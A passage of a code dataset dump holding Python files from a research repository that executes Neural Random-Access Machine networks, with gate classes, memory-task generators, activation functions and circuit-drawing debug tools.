\"-pc\",\n dest=\"print_circuits\",\n type=int,\n default=0,\n help=\"Draw the circuit of each timestep to a file with a progressive numeration [e.g. \"\n \"<filename>.1.1.png, ..., <filename>.S.T.png, where S is the sample and T is the timestep]. \"\n \"With: \"\n \" • 0 the circuits are not printed; \"\n \" • 1 the circuits are printed entirely; \"\n \" • 2 the circuits are printed pruning the Gates or Registers R* which have not a path to a Register(s) R'*.\",)\n ap.add_argument(\"--print_memories_in_step_to_file\", \"-pmtf\",\n dest=\"print_memories\",\n nargs='?',\n const=True,\n default=False,\n help=\"For each sample and for each step, write to file the memory and the registers.\", )\n ap.add_argument(\"--process_pool\",\n \"-pp\",\n dest=\"process_pool\",\n type=int,\n default=1,\n help=\"Set how many threads should be used for the tests.\")\n ap.add_argument(\"--stop_at_the_will\",\n \"-satw\",\n dest=\"stop_at_the_will\",\n nargs='?',\n const=True,\n default=False,\n help=\"Activate the stop for the will of the NRAM.\")\n\n args, leftovers = ap.parse_known_args()\n\n with open(args.file) as f:\n test = json.load(f)\n test_args = test[\"arguments\"]\n\n NRam(NRamContext(\n batch_size=args.batch_size,\n l_max_int=args.max_ints,\n l_sequence_size=args.sequence_size,\n l_timesteps=args.timesteps,\n task_type=\"task_%s\" % test_args[\"task\"],\n network=test[\"network\"],\n gates=[ GateFactory.create(g) for g in test_args[\"gates\"] ],\n info_is_active=args.info,\n print_circuits=args.print_circuits,\n print_memories=args.print_memories,\n path_config_file=os.path.abspath(args.file),\n process_pool=args.process_pool,\n stop_at_the_will=args.stop_at_the_will\n )).execute()\n"
},
{
"alpha_fraction": 0.6307692527770996,
"alphanum_fraction": 0.6384615302085876,
"avg_line_length": 20.75,
"blob_id": "c9f13e5c6ed71c392f58783ffe28e8f7a65f4351",
"content_id": "04feb8cba2ccf9bc7a4d4d5b1289d855c5fff3ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 260,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 12,
"path": "/gates/Zero.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom util import to_one_hot\nfrom gates.Gate import Gate\n\n\nclass Zero(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n return M, to_one_hot(0, M.shape[1])"
},
{
"alpha_fraction": 0.5715162754058838,
"alphanum_fraction": 0.5899325013160706,
"avg_line_length": 44.25,
"blob_id": "540c16fb2ba5f63a498f411c288870e5d6cce247",
"content_id": "e1ec919dd5e08ef3c315788566a55f63ad4d3365",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1637,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 36,
"path": "/tasks/TaskPermutation.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\nfrom util import encode\n\n\nclass TaskPermutation(Task):\n \"\"\" [Permutation]\n Given two arrays of n elements: P (contains a permutation of numbers 0, . . . , n − 1) and\n A (contains random elements), permutate A according to P. Input is given as\n a, P[0], ..., P[n − 1], A[0], ..., A[n − 1], where a is a pointer to the array A. The\n expected output is A[P[0]], ..., A[P[n − 1]], which should override the array P.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n pointer = int(np.ceil(self.max_int / 2) if self.max_int % 2 != 0 else self.max_int / 2)\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, 0] = pointer\n for idx in range(self.batch_size):\n init_mem[idx, 1:(1 + self.sequence_size)] = np.random.permutation(self.sequence_size)\n init_mem[:, pointer:(pointer + self.sequence_size)] = \\\n np.random.randint(1, self.max_int, size=(self.batch_size, self.sequence_size), dtype=np.int32)\n\n out_mem = init_mem.copy()\n permutations = encode(out_mem[:, 1:(1 + self.sequence_size)])\n for idx in range(self.batch_size):\n out_mem[idx, 1:(1 + self.sequence_size)] = np.tensordot(out_mem[idx, pointer:(pointer + self.sequence_size)],\n permutations[idx], axes=(0, 1))\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, 1:(1 + self.sequence_size)] = 1\n\n return init_mem, out_mem, cost_mask\n"
},
{
"alpha_fraction": 0.4833333194255829,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 14.25,
"blob_id": "f3189775d0e1401b145f809242d4cebe59bb246b",
"content_id": "ab8545c95781e2d584e3640d5825dee5f0fab885",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 60,
"license_type": "permissive",
"max_line_length": 17,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "numpy==1.14.0\nmatplotlib==2.1\npygraphviz==1.3.1\ntqdm==4.19.6"
},
{
"alpha_fraction": 0.592476487159729,
"alphanum_fraction": 0.6112852692604065,
"avg_line_length": 25.66666603088379,
"blob_id": "34b7bfd50186a1f1df318dde03e8a78fc4f0e345",
"content_id": "603f8df3cd6a0d60409a4c9e8bbcd3dcc1bd3983",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 319,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 12,
"path": "/activation_functions.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n\ndef relu(a: np.ndarray) -> np.ndarray:\n return np.maximum(a, 0)\n\ndef softmax(a: np.ndarray) -> np.ndarray:\n return np.exp(a - np.max(a)) / np.exp(a - np.max(a)).sum(1)[..., None]\n\ndef sigmoid(a: np.ndarray) -> np.ndarray:\n return 1. / (1. + np.exp(-np.array(a, dtype=np.float64)))"
},
{
"alpha_fraction": 0.6107171177864075,
"alphanum_fraction": 0.6264775395393372,
"avg_line_length": 39.935482025146484,
"blob_id": "9aef294573a8f99af21d3830f9613358831d93b2",
"content_id": "a0134a424ab5699240ccb6cb7ad22847b2870f04",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1277,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 31,
"path": "/tasks/TaskCopy.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskCopy(Task):\n \"\"\" [Copy]\n Given an array and a pointer to the destination, copy all elements from the array to\n the given location. Input is given as p, A[0], ..., A[n−1] where p points to one element after\n A[n−1]. The expected output is A[0], ..., A[n−1] at positions p, ..., p+n−1 respectively.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n remaining_size = int(self.max_int - 2)\n vector_size = min(int(remaining_size / 2), self.sequence_size)\n starting_point = int(np.floor(self.max_int / 2))\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, 1:1 + vector_size] = np.random\\\n .randint(1, self.max_int, size=(self.batch_size, vector_size), dtype=np.int32)\n init_mem[:, 0] = starting_point\n\n out_mem = init_mem.copy()\n out_mem[:, starting_point:starting_point + vector_size] = np.copy(out_mem[:, 1:1 + vector_size])\n\n error_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n error_mask[:, starting_point:starting_point + vector_size] = np.ones((self.batch_size, vector_size))\n\n return init_mem, out_mem, error_mask\n"
},
{
"alpha_fraction": 0.5886625051498413,
"alphanum_fraction": 0.5922393202781677,
"avg_line_length": 41.91162872314453,
"blob_id": "621e26595ab44201ffc0ac3752437f5e0290eb98",
"content_id": "6e373ddff629dae087f167de94f4c66c04bfd92c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9232,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 215,
"path": "/NRam.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Standard\nimport concurrent.futures\nimport os\nimport shutil\n\n# Vendor\nimport numpy as np\n\nfrom tqdm import tqdm\n\n# Project\nfrom App import App\nfrom NRamContext import NRamContext\nfrom DebugTimestep import DebugTimestep\nfrom activation_functions import relu, sigmoid, softmax\nfrom util import print_memories, create_dir\n\n\nclass NRam(object):\n\n def __init__(self, context: NRamContext) -> None:\n self.context = context\n\n def execute(self) -> None:\n print(\"• Execution started\")\n # Create the base directory for a task (e.g. TaskAccess)\n task_base_path = \"%s%s\" % (App.get(\"images_path\"), self.context.tasks[0].__str__())\n create_dir(task_base_path)\n\n # Create the base directory for a test of DENN\n config_filename_without_extension = os.path.splitext(os.path.basename(self.context.path_config_file))[0]\n test_task_base_path = \"%s/%s\" % (task_base_path, config_filename_without_extension)\n create_dir(test_task_base_path, True) # Destroy all if the directory already exists\n\n # Copy the config file, for coherence\n shutil.copyfile(self.context.path_config_file, \"%s/config.json\" % test_task_base_path)\n\n for test_idx, task in enumerate(self.context.tasks):\n difficulty_test_base_path = \"%s/%s\" % (test_task_base_path, test_idx)\n create_dir(difficulty_test_base_path, True)\n\n # Retrieve batch of difficulty\n in_mem, out_mem, cost_mask, regs, timesteps = task()\n # Iterate over sample\n with concurrent.futures.ProcessPoolExecutor(max_workers=self.context.process_pool) as executor:\n futures = [executor.submit(self.execute_test_sample, self.context, s,difficulty_test_base_path,\n in_mem[s], out_mem[s], regs[s], timesteps)\n for s in range(self.context.batch_size)]\n\n for f in tqdm(concurrent.futures.as_completed(futures), total=self.context.batch_size) \\\n if not self.context.info_is_active else concurrent.futures.as_completed(futures):\n s, modified_in_mem = f.result()\n in_mem[s] = modified_in_mem\n print_memories(in_mem, out_mem, cost_mask, difficulty_test_base_path, test_idx)\n print(\"• Execution terminated\")\n\n def execute_test_sample(self, context, s, difficulty_test_base_path, in_mem, out_mem, regs, timesteps):\n if context.print_memories or context.print_circuits is not 0:\n sample_difficulty_base_path = \"%s/%s\" % (difficulty_test_base_path, s)\n create_dir(sample_difficulty_base_path, True)\n\n if context.info_is_active:\n print(\"\\nSample[%d], Initial memory: %s, Desired memory: %s, Initial registers: %s\"\n % (s, in_mem[:].argmax(axis=1), out_mem, regs[:].argmax(axis=1)))\n\n # Iterate for every timestep\n debug = list() # Init debug dictionary for the sample\n for t in range(timesteps):\n dt = DebugTimestep(context, t, s)\n coeffs, complete = self.__run_network(regs, dt)\n regs, in_mem = self.__run_circuit(regs, in_mem, context.gates, coeffs, dt)\n debug.append(dt)\n\n if self.context.stop_at_the_will and complete.sum() >= 1.0:\n break\n\n # Debug for the sample\n if context.info_is_active:\n for dt in debug:\n print(dt)\n print(\"\\t• Expected mem => %s\" % out_mem)\n\n if context.print_memories:\n with open(\"%s/memories.txt\" % sample_difficulty_base_path, \"a+\") as f:\n f.write(\"\\\\textbf{Step} & %s & %s & Read & Write \\\\\\\\ \\hline \\n\"\n % (\" & \".join([\"%s\" % r for r in range(out_mem.shape[0])]),\n \" & \".join([\"\\\\textit{r}%d\" % r for r in range(context.num_regs)])))\n for dt in debug:\n dt.print_memory_to_file(sample_difficulty_base_path, timesteps)\n\n if context.print_circuits is not 0:\n # Create dir for the single example of a difficulty\n for dt in debug:\n if context.print_circuits is 1:\n dt.print_circuit(sample_difficulty_base_path)\n else:\n dt.print_pruned_circuit(sample_difficulty_base_path)\n\n return s, in_mem\n\n def avg(self, regs: np.array, coeff: np.array) -> np.array:\n \"\"\" Make the product between (registers + output of the gates)\n and a coefficient for the value selection \"\"\"\n value = np.array(\n np.tensordot(\n regs.transpose([1, 0]),\n coeff.transpose([1, 0]),\n axes=1\n ).transpose([1, 0]),\n dtype=np.float32\n )\n return value\n\n def __run_gate(self, gate_inputs, mem, gate, controller_coefficients):\n \"\"\"Return the output of a gate in the circuit.\n\n gate_inputs:\n The values of the registers and previous gate outputs.\n gate:\n The gate to compute output for. Arity must\n match len(controller_coefficients).\n controller_coeffficients:\n A list of coefficient arrays from the controller,\n one coefficient for every gate input (0 for constants).\n \"\"\"\n args = [self.avg(gate_inputs, coefficients)\n for coefficients in controller_coefficients]\n mem, output = gate(mem, *args)\n\n # Special-case constant gates.\n # Since they have no outputs, they always output\n # one sample. Repeat their outputs as many times\n # as necessary, effectively doing manual broadcasting\n # to generate an output of the right size.\n if gate.arity == 0:\n output = output[None, ...]\n\n return output, mem, args\n\n def __run_circuit(self, registers: np.array, mem: np.array, gates: np.array,\n controller_coefficients: np.array, debug: DebugTimestep) -> (np.ndarray, np.ndarray):\n # Initially, only the registers may be used as inputs.\n gate_inputs = registers\n\n # Debug purpose, dictionary for gates and regs history\n debug_step_gates = dict()\n debug_step_regs = dict()\n debug_previous_mod_regs = dict()\n\n debug.mem_previous_mod = mem.argmax(axis=1)\n # Run through all the gates.\n ptr = 0\n for i, (gate, coeffs) in enumerate(zip(gates, controller_coefficients)):\n output, mem, args = self.__run_gate(gate_inputs, mem, gate, coeffs)\n\n gate_info = dict()\n for i in range(gate.arity):\n gate_info[str(i)] = [coeffs[i].argmax(), args[i].argmax()]\n gate_info[\"res\"] = output.argmax()\n debug_step_gates[gate.__str__()] = gate_info\n\n # Append the output of the gate as an input for future gates.\n gate_inputs = np.concatenate([gate_inputs, output])\n debug.gates = debug_step_gates\n debug.mem = mem.argmax(axis=1)\n\n # All leftover coefficients are for registers.\n for i, coeff in enumerate(controller_coefficients[len(gates):]):\n debug_previous_mod_regs[str(i)] = [coeff.argmax(), gate_inputs[i].argmax()]\n gate_inputs[i] = self.avg(gate_inputs, coeff)\n debug_step_regs[str(i)] = [coeff.argmax(), gate_inputs[i].argmax()]\n debug.regs_previous_mod = debug_previous_mod_regs\n debug.regs = debug_step_regs\n\n return gate_inputs[np.arange(self.context.num_regs)], mem\n\n def __run_network(self, registers: np.array, debug: dict = None) -> np.array:\n\n def take_params(values, i):\n \"\"\"Return the next pair of weights and biases after the\n starting index and the new starting index.\"\"\"\n return values[i], values[i + 1], i + 2\n\n # Extract the 0th (i.e. P( x = 0 )) component from all registers.\n last_hidden_layer = np.array(registers[:, 0][None, ...], dtype=np.float32)\n\n # Propogate forward to hidden layers.\n idx = 0\n for i in range(self.context.num_hidden_layers):\n W, b, idx = take_params(self.context.network, idx)\n last_hidden_layer = relu(last_hidden_layer.dot(W) + b)\n\n controller_coefficients = []\n for i, gate in enumerate(self.context.gates):\n coeffs = []\n for j in range(gate.arity):\n W, b, idx = take_params(self.context.network, idx)\n coeff = softmax(last_hidden_layer.dot(W) + b)\n coeffs.append(coeff)\n controller_coefficients.append(coeffs)\n\n # Forward propogate to new register value coefficients.\n for i in range(self.context.num_regs):\n W, b, idx = take_params(self.context.network, idx)\n coeff = softmax(last_hidden_layer.dot(W) + b)\n controller_coefficients.append(coeff)\n\n # Forward propogate to generate willingness to complete.\n W, b, idx = take_params(self.context.network, idx)\n complete = sigmoid(last_hidden_layer.dot(W) + b)\n\n if debug is not None:\n debug.fi = np.around(complete.sum(), 3)\n\n return controller_coefficients, complete\n"
},
{
"alpha_fraction": 0.5731343030929565,
"alphanum_fraction": 0.5889126062393188,
"avg_line_length": 46.85714340209961,
"blob_id": "da0ab0474d60687a5bdaae29c18506d6441aa4d1",
"content_id": "cc0a56617ce8e8f6cecdd5dcdb33f5ea2f7b1632",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2353,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 49,
"path": "/tasks/TaskListSearch.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\nclass TaskListSearch(Task):\n \"\"\" [ListSearch]\n Given a pointer to the head of a linked list and a value `v` to find return a pointer\n to the first node on the list with the value `v`. The list is placed in memory in the same way\n as in the task ListK. We fill empty memory with “trash” values to prevent the network from\n “cheating” and just iterating over the whole memory.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n list_size = int((self.max_int - 2) / 2)\n list_elements = np.random.randint(0, self.max_int, size=(self.batch_size, list_size))\n lists_elements_permutations = np.stack([np.random.permutation(list_size) for _ in range(self.batch_size)], axis=0)\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n\n # Create for each example the list\n for example in range(self.batch_size):\n for j, permidx in enumerate(lists_elements_permutations[example]):\n next_element_pointer = np.where(lists_elements_permutations[example] == permidx + 1)[0]\n if permidx == 0: # If the node is the first than set the pointer in the first memory position\n init_mem[example, 0] = 2 + 2 * j\n\n init_mem[example, 2 + (2 * j)] = \\\n -1.0 if len(next_element_pointer) == 0 else 2 + (2 * next_element_pointer[0]) # Set the pointer to the next list node\n init_mem[example, 2 + (2 * j) + 1] = list_elements[example, j] # Set the value of the list node\n init_mem[:, 1] = list_elements[:, 0] # Set the elements to search in the list\n if self.max_int % 2 != 0:\n init_mem[:, -1] = -1\n\n out_mem = init_mem.copy()\n for example in range(self.batch_size):\n found = False\n pointer = out_mem[example, 0]\n while not found and pointer != -1:\n if out_mem[example, pointer + 1] == out_mem[example, 1]:\n out_mem[example, 0] = pointer\n found = True\n else:\n pointer = out_mem[example, pointer]\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, 0] = 1\n\n return init_mem, out_mem, cost_mask\n"
},
{
"alpha_fraction": 0.7163636088371277,
"alphanum_fraction": 0.7163636088371277,
"avg_line_length": 55.617645263671875,
"blob_id": "b7d9c0a36630fa5bd7f5800c691b7dd51e7d02b5",
"content_id": "4b2b797867c1796309d0b1a35bd4bbcc44b4370f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1925,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 34,
"path": "/factories/TaskFactory.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Project\nfrom Singleton import Singleton\nfrom tasks.Task import Task\nfrom tasks.TaskCopy import TaskCopy\nfrom tasks.TaskAccess import TaskAccess\nfrom tasks.TaskIncrement import TaskIncrement\nfrom tasks.TaskSwap import TaskSwap\nfrom tasks.TaskReverse import TaskReverse\nfrom tasks.TaskPermutation import TaskPermutation\nfrom tasks.TaskListK import TaskListK\nfrom tasks.TaskListSearch import TaskListSearch\nfrom tasks.TaskMerge import TaskMerge\nfrom tasks.TaskWalkBST import TaskWalkBST\nfrom tasks.TaskSum import TaskSum\nfrom tasks.TaskProduct import TaskProduct\n\nclass TaskFactory(metaclass=Singleton):\n\n @staticmethod\n def create(name: str, batch_size: int, max_int: int, num_regs: int, timestep: int, sequence_size: int) -> Task:\n return {\n \"task_copy\": TaskCopy(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_access\": TaskAccess(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_increment\": TaskIncrement(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_swap\": TaskSwap(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_reverse\": TaskReverse(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_permutation\": TaskPermutation(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_list_k\": TaskListK(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_list_search\": TaskListSearch(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_merge\": TaskMerge(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_walkbst\": TaskWalkBST(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_sum\": TaskSum(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_product\": TaskProduct(batch_size, max_int, num_regs, timestep, sequence_size),\n }[name]\n"
},
{
"alpha_fraction": 0.6507575511932373,
"alphanum_fraction": 0.6507575511932373,
"avg_line_length": 33.76315689086914,
"blob_id": "27d8c7a2de11dfbe8b036834e8c1ffd8251e8f2f",
"content_id": "75c1eac8a2d7d71bda69a2d5d10dc9c0b0b1ca0d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1320,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 38,
"path": "/factories/GateFactory.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Project\nfrom Singleton import Singleton\nfrom gates.Gate import GateArity\nfrom gates.Read import Read\nfrom gates.Zero import Zero\nfrom gates.One import One\nfrom gates.Two import Two\nfrom gates.Inc import Inc\nfrom gates.Add import Add\nfrom gates.Sub import Sub\nfrom gates.Dec import Dec\nfrom gates.LessThan import LessThan\nfrom gates.LessEqualThan import LessEqualThan\nfrom gates.EqualThan import EqualThan\nfrom gates.Min import Min\nfrom gates.Max import Max\nfrom gates.Write import Write\n\nclass GateFactory(metaclass=Singleton):\n\n @staticmethod\n def create(cls):\n return {\n \"read\": Read(GateArity.UNARY.value),\n \"zero\": Zero(GateArity.CONST.value),\n \"one\": One(GateArity.CONST.value),\n \"two\": Two(GateArity.CONST.value),\n \"inc\": Inc(GateArity.UNARY.value),\n \"add\": Add(GateArity.BINARY.value),\n \"sub\": Sub(GateArity.BINARY.value),\n \"dec\": Dec(GateArity.UNARY.value),\n \"lt\": LessThan(GateArity.BINARY.value),\n \"let\": LessEqualThan(GateArity.BINARY.value),\n \"eq\": EqualThan(GateArity.BINARY.value),\n \"min\": Min(GateArity.BINARY.value),\n \"max\": Max(GateArity.BINARY.value),\n \"write\": Write(GateArity.BINARY.value),\n }[cls]"
},
{
"alpha_fraction": 0.49694502353668213,
"alphanum_fraction": 0.5021639466285706,
"avg_line_length": 39.081634521484375,
"blob_id": "5d470094f16283a9d52bc8662705ffc61ae3cff9",
"content_id": "f117588313fcc1b19b7a06499551a3c9ca6bb930",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7864,
"license_type": "permissive",
"max_line_length": 127,
"num_lines": 196,
"path": "/DebugTimestep.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Standard\nfrom subprocess import Popen\n\n# Vendor\nimport numpy as np\nimport pygraphviz as pgv\n\n# Project\nfrom Node import Node\nfrom NRamContext import NRamContext\n\n\nclass DebugTimestep(object):\n def __init__(self, context: NRamContext, timestep: int, sample: int) -> None:\n self.context = context\n self.timestep = timestep\n self.sample = sample\n self.__gates = dict()\n self.__regs = dict()\n self.__regs_previous_mod = dict()\n self.__mem = np.array([], dtype=np.float32)\n self.__mem_previous_mod = np.array([], dtype=np.float32)\n self.__fi = 0\n\n @property\n def gates(self) -> dict():\n return self.__gates\n\n @gates.setter\n def gates(self, gates: dict) -> None:\n self.__gates = gates\n\n @property\n def regs(self) -> dict:\n return self.__regs\n\n @regs.setter\n def regs(self, regs: dict) -> None:\n self.__regs = regs\n\n @property\n def mem(self) -> np.ndarray:\n return self.__mem\n\n @mem.setter\n def mem(self, mem: dict) -> None:\n self.__mem = mem\n\n @property\n def mem_previous_mod(self) -> np.ndarray:\n return self.__mem_previous_mod\n\n @mem_previous_mod.setter\n def mem_previous_mod(self, mem: dict) -> None:\n self.__mem_previous_mod = mem\n\n @property\n def regs_previous_mod(self) -> dict:\n return self.__regs_previous_mod\n\n @regs_previous_mod.setter\n def regs_previous_mod(self, regs: dict) -> None:\n self.__regs_previous_mod = regs\n\n @property\n def fi(self) -> float:\n return self.__fi\n\n @fi.setter\n def fi(self, fi):\n self.__fi = fi\n\n def __retrieve_gates_or_register(self, idx: int) -> str:\n \"\"\"Retrieve the right name for a coefficient (i.e. if it is a Register or a Gate)\"\"\"\n if idx in range(self.context.num_regs):\n return \"R%s\" % idx\n else:\n return self.context.gates[idx - self.context.num_regs].__str__()\n\n def print_pruned_circuit(self, path: str) -> bool:\n \"\"\" Print the circuit for the samples \"\"\"\n\n context = self.context\n nodes = {}\n\n for r in range(context.num_regs):\n nodes[\"R%s\" % str(r)] = Node(Node.Register, \"R%s\" % str(r))\n\n for g in context.gates:\n nodes[g.__str__()] = Node(Node.Register, g.__str__(), g.arity)\n for a in range(g.arity):\n coeff = self.__retrieve_gates_or_register(self.gates[g.__str__()][str(a)][0])\n nodes[coeff].add_node(nodes[g.__str__()])\n\n for r in range(context.num_regs):\n node_name = \"R'%s\" % str(r)\n nodes[\"R'%s\" % str(r)] = Node(Node.Register, node_name)\n nodes[self.__retrieve_gates_or_register(self.regs[str(r)][0])].add_node(nodes[node_name])\n\n right_nodes = []\n for key, node in nodes.items():\n if node.check_validity() and key not in right_nodes:\n right_nodes.append(node.name)\n\n return self.print_circuit(path, right_nodes)\n\n def print_circuit(self, path: str, nodes_to_prune: list = list()) -> bool:\n context = self.context\n\n G = pgv.AGraph(directed=True, strict=False, name=\"%s - Timestep %s\" % (self.context.tasks[0].__str__(), self.timestep))\n G.graph_attr[\"rankdir\"] = \"LR\"\n for r in range(context.num_regs):\n node_name = \"R%s\" % str(r)\n if len(nodes_to_prune) == 0 or node_name in nodes_to_prune:\n G.add_node(node_name, shape=\"circle\")\n\n for g in context.gates:\n if len(nodes_to_prune) == 0 or g.__str__() in nodes_to_prune:\n G.add_node(g.__str__(), shape=\"rectangle\")\n G.get_node(g.__str__()).attr[\"style\"] = \"bold\"\n for a in range(g.arity):\n coeff = self.__retrieve_gates_or_register(self.gates[g.__str__()][str(a)][0])\n G.add_edge(coeff, g.__str__())\n if g.__str__() is \"Write\":\n G.get_edge(coeff, g.__str__()).attr[\"label\"] = \"ptr\" if a is 0 else \"val\"\n elif g.__str__() is \"Read\":\n G.get_edge(coeff, g.__str__()).attr[\"label\"] = \"ptr\"\n elif g.__str__() in [\"Add\", \"Sub\", \"LessThan\", \"LessEqualThan\", \"EqualThan\", \"Min\", \"Max\"]:\n G.get_edge(coeff, g.__str__()).attr[\"label\"] = \"x\" if a is 0 else \"y\"\n\n for r in range(context.num_regs):\n node_name = \"R'%s\" % str(r)\n if len(nodes_to_prune) == 0 or node_name in nodes_to_prune:\n G.add_node(\"R'%s\" % str(r))\n G.add_node(node_name, shape=\"circle\")\n G.add_edge(self.__retrieve_gates_or_register(self.regs[str(r)][0]), node_name)\n\n # Removes the unattached register not modified and gates not attached to other objects (gates/register)\n for node in G.nodes_iter():\n if len(list(G.neighbors(node))) == 0:\n G.remove_node(node.name)\n\n G.layout(prog=\"dot\")\n circuit_path = \"%s/circuit.%s\" % (path, self.timestep)\n G.draw(\"%s.png\" % circuit_path, format=\"png\")\n G.write(\"%s.dot\" % circuit_path)\n\n Popen(\"dot2tex -ftikz %s.dot > %s.tex\" % (circuit_path, circuit_path), shell=True).wait()\n\n return True\n\n def print_memory_to_file(self, path: str, max_timestep: int):\n t = self.timestep\n with open(\"%s/memories.txt\" % path, \"a+\") as f:\n timestep_regs = [reg[1] for idx, reg in self.regs.items()]\n timestep_regs_previous_mod = [reg[1] for idx, reg in self.regs_previous_mod.items()]\n if t + 1 < max_timestep:\n f.write(\"%d & %s & %s & p:%s & p:%s v:%s \\\\\\\\ \\n\"\n % (t + 1,\n \" & \".join([\"%d\" % v for v in self.mem_previous_mod]),\n \" & \".join([\"%d\" % r for r in timestep_regs]),\n self.gates[\"Read\"]['0'][1],\n self.gates[\"Write\"]['0'][1], self.gates[\"Write\"]['1'][1]))\n else:\n f.write(\"%d & %s & %s & p:%s & p:%s v:%s\\\\\\\\ \\hline \\n\"\n % ( t + 1,\n \" & \".join([\"%d\" % v for v in self.mem_previous_mod]),\n \" & \".join([\"%d\" % r for r in timestep_regs]),\n self.gates[\"Read\"]['0'][1],\n self.gates[\"Write\"]['0'][1], self.gates[\"Write\"]['1'][1]))\n f.write(\"\\\\rowcolor{Gray}Final & %s & %s & $\\\\times$ & $\\\\times$ \\\\\\\\\"\n % (\" & \".join([\"%d\" % v for v in self.mem]),\n \" & \".join([\"%d\" % r for r in timestep_regs])))\n\n def __str__(self) -> str:\n\n def register_or_gates(type: int, idx: int, value: int = -1) -> str:\n if idx in range(self.context.num_regs): # Is a register\n return \"R%d: %d\" % (idx, value) if type is 0 else \"R%d\" % (idx)\n else: # Otherwise is a gate\n return \"%s: %d\" % (self.context.gates[idx - self.context.num_regs].__str__(), value) if type is 0 \\\n else \"%s\" % (self.context.gates[idx - self.context.num_regs].__str__())\n\n output = \"Timestep %d\\n\" % (self.timestep)\n for g in self.context.gates:\n values = [self.gates[g.__str__()][str(a)] for a in range(g.arity)]\n output += \"\\t• %s(%s) => %d\\n\" \\\n % (\n g, \", \".join([register_or_gates(0, *value) for value in values]), self.gates[g.__str__()][\"res\"])\n\n for r in range(self.context.num_regs):\n output += \"\\t• R%d' (%s) => %d\\n\" % (r, register_or_gates(1, self.regs[str(r)][0]), self.regs[str(r)][1])\n\n output += \"\\t• Fi => %s\\n\" % self.fi\n output += \"\\t• Mem => %s\" % self.mem\n return output\n"
},
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.5512572526931763,
"avg_line_length": 18.148147583007812,
"blob_id": "239a94df9745750d6052b539f46708e5596cc70a",
"content_id": "f168779ea7b40054029e99e53eaddd79d14cefa5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 517,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 27,
"path": "/gates/Gate.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
